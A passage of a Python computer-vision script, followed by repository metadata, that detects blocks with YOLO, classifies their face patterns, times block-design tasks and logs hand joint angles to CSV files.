str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 4:\r\n cv2.putText(frame, \"Rotate Type 4 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 5:\r\n cv2.putText(frame, \"Rotate Type 5 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 6:\r\n cv2.putText(frame, 
\"Rotate Type 6 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2) #+ str_conf + \"%\"\r\n '''\r\n rotate_type = predicted_rnn.item()\r\n #print(predicted.item())\r\n\r\n\r\n\r\n\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Block Detection\r\n\r\n # Frame threshold \r\n imgBlur = cv2.GaussianBlur(frame, (7,7), 1)\r\n imgGray = cv2.cvtColor(imgBlur, cv2.COLOR_BGR2GRAY)\r\n ret, imgThres = cv2.threshold(imgGray, 195, 255, cv2.THRESH_BINARY)\r\n \r\n # Make detections \r\n results = model_yolo(frame_next)\r\n\r\n df_tracked_objects = results.pandas().xyxy[0]\r\n list_tracked_objects = df_tracked_objects.values.tolist()\r\n #print(list_tracked_objects)\r\n \r\n #if len(list_tracked_objects) == 4: #>0\r\n\r\n box_num = 0\r\n box_face = 0\r\n box_list = []\r\n box_design = []\r\n box_distance = []\r\n box_design_sort = []\r\n\r\n box_near_hand = []\r\n #avg_confidence = []\r\n\r\n pos_x = []\r\n pos_y = []\r\n\r\n for x1, y1, x2, y2, conf_pred, cls_id, cls in list_tracked_objects:\r\n\r\n if conf_pred > 0.8:\r\n\r\n #avg_confidence.append( round(conf_pred,2) )\r\n\r\n center_x = int ((x1+x2)/2)\r\n center_y = int ((y1+y2)/2)\r\n x1 = int(x1)\r\n x2 = int(x2)\r\n y1 = int(y1)\r\n y2 = int(y2)\r\n w = int (x2-x1)\r\n h = int (y2-y1)\r\n\r\n box_distance.append( int (math.sqrt( pow(center_x, 2) + pow(center_y, 2) )) )\r\n #print(center_x, center_y)\r\n\r\n pos_x.append( int (center_x) )\r\n pos_y.append( int (center_y) )\r\n \r\n dim = (100, 100)\r\n imgBox = cv2.resize(imgThres[y1:y2, x1:x2], dim, interpolation = cv2.INTER_AREA)\r\n #cv2.imshow(\"Box_\"+str(box_num), imgBox)\r\n \r\n box_class = [ imgBox[50,25], imgBox[75,50], imgBox[50,75], imgBox[25,50] ]\r\n\r\n if box_class == [0,0,0,0] :\r\n box_face = 1\r\n box_design.append(1)\r\n elif box_class == [255,255,255,255]:\r\n box_face = 2\r\n box_design.append(2)\r\n #... 
dipisah\r\n elif box_class == [255,255,0,0]:\r\n box_face = 3\r\n box_design.append(3) \r\n elif box_class == [255,0,0,255]:\r\n box_face = 4\r\n box_design.append(4) \r\n elif box_class == [0,0,255,255]:\r\n box_face = 5\r\n box_design.append(5) \r\n elif box_class == [0,255,255,0]:\r\n box_face = 6\r\n box_design.append(6) \r\n \r\n cv2.rectangle(frame, (x1,y1), (x1+w, y1+h), (0, 255, 0), 2)\r\n\r\n # Select Block Inside Hand\r\n\r\n if hand_status == True:\r\n if (center_x > min_hand_x-150 and center_x < max_hand_x+150 ) and (center_y > min_hand_y-150 and center_y < max_hand_y+150):\r\n cv2.rectangle(frame, (x1,y1), (x1+w, y1+h), (0, 0, 255), 5)\r\n box_near_hand.append(box_face)\r\n #print(box_face)\r\n #else:\r\n # print(0)\r\n #else:\r\n # print(0)\r\n \r\n cv2.putText(frame, str(round(conf_pred,2)), (int(x1), int(y1) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\r\n #cv2.putText(frame, \"id:\" +str(box_num), (int(x1), int(y1) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\r\n\r\n box_num = box_num + 1\r\n roi_label = frame[y1:y1+50, x1:x1+50]\r\n\r\n if(box_face == 1):\r\n roi_label [np.where(mask_face_01)] = 0\r\n roi_label += face_01\r\n elif(box_face == 2):\r\n roi_label [np.where(mask_face_02)] = 0\r\n roi_label += face_02\r\n elif(box_face == 3):\r\n roi_label [np.where(mask_face_03)] = 0\r\n roi_label += face_03\r\n elif(box_face == 4):\r\n roi_label [np.where(mask_face_04)] = 0\r\n roi_label += face_04\r\n elif(box_face == 5):\r\n roi_label [np.where(mask_face_05)] = 0\r\n roi_label += face_05\r\n elif(box_face == 6):\r\n roi_label [np.where(mask_face_05)] = 0\r\n roi_label += face_06\r\n \r\n # Draw objects features\r\n #cv2.circle(frame, (x, y), radius=5, color=(0, 255, 0), thickness=-1)\r\n #cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), 2)\r\n #cv2.putText(frame, cls , (int(x1), int(y1) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\r\n\r\n #print(box_design)\r\n #print (box_near_hand)\r\n\r\n \r\n\r\n\r\n if len(box_design) == 4 and len(box_distance) == 4:\r\n\r\n # >>>>>>>>>>>>\r\n\r\n box_0 = (pos_x[0], pos_y[0])\r\n box_1 = (pos_x[1], pos_y[1])\r\n box_2 = (pos_x[2], pos_y[2])\r\n box_3 = (pos_x[3], pos_y[3])\r\n\r\n frame = cv2.line(frame, box_0, box_1, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_0, box_2, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_0, box_3, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_1, box_2, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_1, box_3, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_2, box_3, (0, 0, 0), 2)\r\n\r\n pos_x_order = [ pos_x[0], pos_x[1], pos_x[2], pos_x[3] ]\r\n pos_y_order = [ pos_y[0], pos_y[1], pos_y[2], pos_y[3] ]\r\n\r\n #if ( abs(pos_x[0] - pos_x[1]) < 100) and \\\r\n # ( abs(pos_x[0] - pos_x[2]) < 100) and \\\r\n # ( abs(pos_x[0] - pos_x[3]) < 100) and \\\r\n # ( abs(pos_x[1] - pos_x[2]) < 100) and \\\r\n # ( abs(pos_x[1] - pos_x[3]) < 100) and \\\r\n # ( abs(pos_x[2] - pos_x[3]) < 100):\r\n\r\n # start = time.time()\r\n \r\n #elif( abs(pos_y[0] - pos_y[1]) < 100) and \\\r\n # ( abs(pos_y[0] - pos_y[2]) < 100) and \\\r\n # ( abs(pos_y[0] - pos_y[3]) < 100) and \\\r\n # ( abs(pos_y[1] - pos_y[2]) < 100) and \\\r\n # ( abs(pos_y[1] - pos_y[3]) < 100) and \\\r\n # ( abs(pos_y[2] - pos_y[3]) < 100):\r\n\r\n # start = time.time()\r\n\r\n # >>>>>>>>>>>>\r\n\r\n len_0 = int (math.sqrt( (pos_x[0]-pos_x[1])**2 + (pos_y[0]-pos_y[1])**2 ) )\r\n len_1 = int (math.sqrt( (pos_x[1]-pos_x[2])**2 + (pos_y[1]-pos_y[2])**2 ) )\r\n len_2 = int (math.sqrt( (pos_x[2]-pos_x[3])**2 + 
(pos_y[2]-pos_y[3])**2 ) )\r\n len_3 = int (math.sqrt( (pos_x[3]-pos_x[0])**2 + (pos_y[3]-pos_y[0])**2 ) )\r\n len_4 = int (math.sqrt( (pos_x[0]-pos_x[2])**2 + (pos_y[0]-pos_y[2])**2 ) )\r\n len_5 = int (math.sqrt( (pos_x[1]-pos_x[3])**2 + (pos_y[1]-pos_y[3])**2 ) )\r\n\r\n # Order Len\r\n len_order = [ len_0, len_1, len_2, len_3, len_4, len_5 ]\r\n len_rect = sorted(len_order)\r\n\r\n if ( abs(len_rect[0] - len_rect[1]) < 50) and \\\r\n ( abs(len_rect[0] - len_rect[2]) < 50) and \\\r\n ( abs(len_rect[0] - len_rect[3]) < 50) and \\\r\n ( abs(len_rect[1] - len_rect[2]) < 50) and \\\r\n ( abs(len_rect[1] - len_rect[3]) < 50) and \\\r\n ( abs(len_rect[2] - len_rect[3]) < 50):\r\n\r\n # >>>>>>>>>>>>\r\n \r\n sort_index = sorted(range(len(box_distance)), key=lambda k: box_distance[k])\r\n\r\n for i in range(len(sort_index)):\r\n box_design_sort.append(box_design[sort_index[i]])\r\n \r\n print(\"----- TASK :\" + str(box_design_sort))\r\n\r\n if box_design_sort == ans_01:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_01)] = 0\r\n test_label += img_01\r\n task_state = 1\r\n \r\n if(timer_flag_01):\r\n end = time.time()\r\n timer_task_01 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_01)\r\n\r\n print (\"TASK 1 COMPLETED in \" + str(timer_task_01) +\" seconds\")\r\n timer_flag_01 = False\r\n else:\r\n print (\"TASK 1 COMPLETED in \" + str(timer_task_01) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_02:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_02)] = 0\r\n test_label += img_02\r\n task_state = 1\r\n \r\n if(timer_flag_02):\r\n end = time.time()\r\n timer_task_02 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_02)\r\n\r\n print (\"TASK 2 COMPLETED in \" + str(timer_task_02) +\" seconds\")\r\n timer_flag_02 = False\r\n else:\r\n print (\"TASK 2 COMPLETED in \" + str(timer_task_02) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_03:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_03)] = 0\r\n test_label += img_03\r\n task_state = 1\r\n\r\n if(timer_flag_03):\r\n end = time.time()\r\n timer_task_03 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_03)\r\n\r\n print (\"TASK 3 COMPLETED in \" + str(timer_task_03) +\" seconds\")\r\n timer_flag_03 = False\r\n else:\r\n print (\"TASK 3 COMPLETED in \" + str(timer_task_03) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_04:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_04)] = 0\r\n test_label += img_04\r\n task_state = 1\r\n \r\n if(timer_flag_04):\r\n end = time.time()\r\n timer_task_04 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_04)\r\n \r\n print (\"TASK 4 COMPLETED in \" + str(timer_task_04) +\" seconds\")\r\n timer_flag_04 = False\r\n else:\r\n print (\"TASK 4 COMPLETED in \" + str(timer_task_04) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_05:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_05)] = 0\r\n test_label += img_05\r\n task_state = 1\r\n \r\n if(timer_flag_05):\r\n end = time.time()\r\n timer_task_05 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_05)\r\n\r\n print (\"TASK 5 COMPLETED in \" + str(timer_task_05) +\" seconds\")\r\n timer_flag_05 = False\r\n else:\r\n print (\"TASK 5 COMPLETED in \" + str(timer_task_05) +\" seconds\")\r\n 
start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_06:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_06)] = 0\r\n test_label += img_06\r\n task_state = 1\r\n \r\n if(timer_flag_06):\r\n end = time.time()\r\n timer_task_06 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_06)\r\n\r\n print (\"TASK 6 COMPLETED in \" + str(timer_task_06) +\" seconds\")\r\n timer_flag_06 = False\r\n else:\r\n print (\"TASK 6 COMPLETED in \" + str(timer_task_06) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_07:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_07)] = 0\r\n test_label += img_07\r\n task_state = 1\r\n \r\n if(timer_flag_07):\r\n end = time.time()\r\n timer_task_07 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_07)\r\n \r\n print (\"TASK 7 COMPLETED in \" + str(timer_task_07) +\" seconds\")\r\n timer_flag_07 = False\r\n else:\r\n print (\"TASK 7 COMPLETED in \" + str(timer_task_07) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_08:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_08)] = 0\r\n test_label += img_08\r\n task_state = 1\r\n \r\n if(timer_flag_08):\r\n end = time.time()\r\n timer_task_08 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_08)\r\n \r\n print (\"TASK 8 COMPLETED in \" + str(timer_task_08) +\" seconds\")\r\n timer_flag_08 = False\r\n else:\r\n print (\"TASK 8 COMPLETED in \" + str(timer_task_08) +\" seconds\")\r\n start = time.time()\r\n \r\n\r\n else:\r\n print (\"NOT COMPLETE\")\r\n\r\n box_design = []\r\n box_distance = []\r\n box_design_sort = []\r\n\r\n\r\n #cv2.imshow('Stream', frame)\r\n\r\n #else:\r\n # cv2.imshow('Stream', frame_next)\r\n \r\n #elif len(box_design) != 0 :\r\n #sort_index = sorted(range(len(box_distance)), key=lambda k: box_distance[k])\r\n\r\n #for i in range(len(sort_index)):\r\n # box_design_sort.append(box_design[sort_index[i]])\r\n \r\n # print(box_design) #_sort\r\n \r\n #else:\r\n # print(\"NOT DETECTED\")\r\n\r\n\r\n #print(str(n_frame) + \" processed\")\r\n #cv2.imshow('Stream', np.squeeze(results.render()))\r\n\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Put Text\r\n\r\n #cv2.putText(frame, \"Timer \", (150, 750), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 2)\r\n #cv2.putText(frame, str(timer_task) + \" s\", (350, 750), cv2.FONT_HERSHEY_SIMPLEX, 3, (0, 0, 255), 5)\r\n\r\n #if(timer_flag_01 == False):\r\n # cv2.putText(frame, \"Task 1 : \" + str(timer_task_01) + \" s\", (150, 800), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_02 == False):\r\n # cv2.putText(frame, \"Task 2 : \" + str(timer_task_02) + \" s\", (150, 830), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_03 == False):\r\n # cv2.putText(frame, \"Task 3 : \" + str(timer_task_03) + \" s\", (150, 860), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_04 == False):\r\n # cv2.putText(frame, \"Task 4 : \" + str(timer_task_04) + \" s\", (150, 890), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_05 == False):\r\n # cv2.putText(frame, \"Task 5 : \" + str(timer_task_05) + \" s\", (150, 920), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_06 == False):\r\n # cv2.putText(frame, \"Task 6 : \" + str(timer_task_06) + \" s\", (150, 950), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_07 == False):\r\n # cv2.putText(frame, 
\"Task 7 : \" + str(timer_task_07) + \" s\", (150, 980), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_08 == False):\r\n # cv2.putText(frame, \"Task 8 : \" + str(timer_task_08) + \" s\", (150, 1010), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n \r\n cv2.imshow('Stream', frame)\r\n\r\n timer = round (time.time() - start_zero , 2) \r\n writer_sta.writerow([ timer, timer_task, grasp_type, rotate_type, str(box_near_hand) ])\r\n\r\n #if (thumb_state == 1 or task_state == 1): # or thumb_state == -1\r\n # efficacy_state = 1\r\n #else:\r\n # efficacy_state = 0q\r\n\r\n if (hand_status == True):\r\n writer_ang.writerow([ timer, timer_task, \r\n angle_0[0], angle_0[1], angle_0[2],\r\n angle_1[0], angle_1[1], angle_1[2],\r\n angle_2[0], angle_2[1], angle_2[2], \r\n angle_3[0], angle_3[1], angle_3[2],\r\n angle_4[0], angle_4[1], angle_4[2], task_state, thumb_state ])\r\n \r\n\r\n\r\n print( \"GRASP :\" + str(grasp_pose) + \" ; TIMER :\" + str(timer_task_all) )\r\n\r\n #n_contour = 0\r\n\r\n #else:\r\n #print(n_frame)\r\n #cv2.drawContours(frame, contours, -1, (0, 255, 0), 2)\r\n\r\n #cv2.imshow('Stream', frame)\r\n \r\n if cv2.waitKey(10) & 0xFF == ord('q'):\r\n break\r\n\r\n n_frame = n_frame + 1\r\n\r\n else:\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n", "repo_name": "anom-tmu/bdt-multiscopic", "sub_path": "03_testing_uppertable.py", "file_name": "03_testing_uppertable.py", "file_ext": "py", "file_size_in_byte": 53667, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "csv.writer", "line_number": 40, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 71, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 72, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 73, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "torch_geometric.nn.global_mean_pool", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 102, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GraphConv", "line_number": 104, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GraphConv", "line_number": 105, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GraphConv", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 107, "usage_type": "call"}, {"api_name": "torch_geometric.nn.global_mean_pool", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", 
"line_number": 135, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 135, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 153, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 164, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 164, "usage_type": "name"}, {"api_name": "torch.nn.GRU", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 174, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 181, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 205, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 220, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 225, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 228, "usage_type": "call"}, {"api_name": "mediapipe.solutions", "line_number": 239, "usage_type": "attribute"}, {"api_name": "mediapipe.solutions", "line_number": 240, "usage_type": "attribute"}, {"api_name": "numpy.multiply", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 285, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 287, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 288, "usage_type": "call"}, {"api_name": "math.acos", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 291, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 296, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 297, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 297, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 317, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 319, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 320, "usage_type": "call"}, {"api_name": "math.acos", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 323, "usage_type": "attribute"}, {"api_name": "torch.hub.load", "line_number": 347, "usage_type": "call"}, {"api_name": 
"torch.hub", "line_number": 347, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 362, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 364, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 364, "usage_type": "attribute"}, {"api_name": "cv2.resizeWindow", "line_number": 365, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 367, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 367, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 368, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 368, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 369, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 369, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 370, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 370, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 371, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 371, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 372, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 372, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 382, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 382, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 383, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 383, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 384, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 384, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 385, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 385, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 386, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 386, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 387, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 387, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 389, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 389, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 390, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 390, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 391, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 391, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 392, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 392, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 393, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 393, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 394, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 394, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 398, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 399, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 400, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 401, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 402, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 403, "usage_type": 
"call"}, {"api_name": "cv2.imread", "line_number": 404, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 405, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 406, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 407, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 409, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 409, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 410, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 410, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 411, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 411, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 412, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 412, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 413, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 413, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 414, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 414, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 415, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 415, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 416, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 416, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 417, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 417, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 418, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 418, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 420, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 420, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 421, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 421, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 422, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 422, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 423, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 423, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 424, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 424, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 425, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 425, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 426, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 426, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 427, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 427, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 428, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 428, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 429, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 429, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 471, "usage_type": "call"}, {"api_name": "time.time", "line_number": 472, "usage_type": "call"}, {"api_name": "time.time", 
